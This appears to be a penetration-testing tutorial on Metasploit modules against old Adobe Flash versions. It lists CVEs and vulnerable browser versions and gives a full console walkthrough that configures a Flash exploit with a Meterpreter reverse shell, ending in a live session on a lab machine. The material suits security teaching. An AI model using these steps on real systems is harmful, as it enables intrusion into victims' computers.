05- Metasploit Basics- Attacking Flash
In 03- Metasploit Basics- Attacking the Browser, we saw how to attack perform attacks against both the Internet Explorer and the Firefox browser, both in Windows and Linux operating systems. Attacks against users using these browsers does not have to be limited to just attacking the browser itself. Most browsers use one or more plugins to handle specialized content. Adobe Flash is a plugin that allows certain kinds of active content to be displayed directly in a browser. It has been subject to a number of attacks, and there are a number of Metasploit modules that target it.
As we saw when attacking the browser, it is critical to know something about the target when selecting an exploit; they are tailored to particular combinations of browser and flash version. Moreover, some modules, especially older modules only work against Windows XP targets. Since that Windows XP is now past its end-of-life, we will not discuss modules that only impact Windows XP. Note that this does not mean that the underlying flaw could not be exploited on other machines, only that the Metasploit module is ineffective against non-XP targets.
If you want to test one or more of these modules, remember that you can get copies of old and out-of-date versions of Adobe Flash directly from Adobe.
Metasploit Modules for Adobe Flash
- Adobe Flash Player AVM Bytecode Verification Vulnerability
- CVE-2011-0609
- Flash 10, <=10.2.152.33
- Vulnerable: IE6, IE7, or Firefox 3.6
- Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
- CVE-2011-0611
- Flash 10, <=10.2.153.1
- Vulnerable:
- Windows Vista, IE7
- Windows 7, IE8
- Adobe Flash Player AVM Verification Logic Array Indexing Code Execution
- CVE-2011-2110
- Flash 10, <=10.3.181.23
- Vulnerable: IE6, IE7, IE8, Firefox 10.
- Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
- CVE-2011-2140
- Flash 10, <=10.3.181.25
- Vulnerable: IE7
- Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow
- CVE-2012-1535
- Flash 11, < 11.3.300.271
- Vulnerable: IE7, IE8, IE9
- Requires Java on the target for the ROP chain.
- Adobe Flash Player Regular Expression Heap Overflow
- CVE-2013-0634
- Flash 11.5, <11.5.502.149
- Vulnerable: IE8
- Note: The module notes (and list of targets) list Windows 7 SP1 but do not list Windows 7 SP0. Fret not, it works if SP1 is not installed.
- Adobe Flash Player Integer Underflow Remote Code Execution
- CVE-2014-0497
- Flash 11, 12 <12.0.0.43
- Note that on Windows 8 SP0, IE 10 ships with Flash 11.3.372, which is vulnerable to this exploit. Moreover, this does not require other software on the target for a ROP chain.
- Adobe Flash Player Shader Buffer Overflow
- CVE-2014-0515
- Flash 11, 12, 13 <13.0.0.182
- Note that on Windows 8 SP0, IE 10 ships with Flash 11.3.372, which is vulnerable to this exploit. Moreover, this does not require other software on the target for a ROP chain.
- Adobe Flash Player Type Confusion Remote Code Execution
- CVE-2013-5331
- Flash 117, 11.8, 11.9 <11.9.900.170
After looking these over, if you ask me which are my favorites, they are clearly Adobe Flash Player Integer Underflow Remote Code Execution and Adobe Flash Player Shader Buffer Overflow. Both are robust and work on a wider range of modern systems. Add to the fact that they work reliably on a stock Windows 8 system, and I am sold.
Let’s demonstrate one in action:
msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof msf exploit(adobe_flash_pixel_bender_bof) > set uripath bob uripath => bob msf exploit(adobe_flash_pixel_bender_bof) > set payload windows/ meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(adobe_flash_pixel_bender_bof) > set lhost 10.0.1.26 lhost => 10.0.1.26 msf exploit(adobe_flash_pixel_bender_bof) > show options Module options (exploit/windows/browser/adobe_flash_pixel_bender_bof): Name Current Setting Required Description ---- --------------- -------- ----------- Retries false no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH bob no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none) LHOST 10.0.1.26 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(adobe_flash_pixel_bender_bof) > exploit -j [*] Exploit running as background job. msf exploit(adobe_flash_pixel_bender_bof) > [*] Started reverse handler on 10.0.1.26:4444 [*] Using URL: http://0.0.0.0:8080/bob [*] Local IP: http://10.0.1.26:8080/bob [*] Server started. msf exploit(adobe_flash_pixel_bender_bof) > [*] 10.0.2.2 adobe_flash_pixel_bender_bof - Gathering target information. [*] 10.0.2.2 adobe_flash_pixel_bender_bof - Sending response HTML. [*] 10.0.2.2 adobe_flash_pixel_bender_bof - Request: /bob/dVUXen/ [*] 10.0.2.2 adobe_flash_pixel_bender_bof - Sending HTML... [*] 10.0.2.2 adobe_flash_pixel_bender_bof - Request: /bob/dVUXen /MFbh.swf [*] 10.0.2.2 adobe_flash_pixel_bender_bof - Sending SWF... [*] Sending stage (770048 bytes) to 10.0.2.2 [*] Meterpreter session 1 opened (10.0.1.26:4444 -> 10.0.2.2:56351) at 2014-06-04 20:19:29 -0400 msf exploit(adobe_flash_pixel_bender_bof) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 APOLLO\zathras @ APOLLO 10.0.1.26:4444 -> 10.0.2.2:56351 (10.0.2.8) msf exploit(adobe_flash_pixel_bender_bof) >
The process is the same as what we saw for browser attacks. In this case I updated the URI (who would think "bob" would be malicious ☺; besides it is easier to type. I again used a reverse meterpreter shell for the payload, with a listening host IP address of my attack system. Automatic targeting works well for this module. Run the exploit, and get the user to visit the web page. The shell pops quite quickly.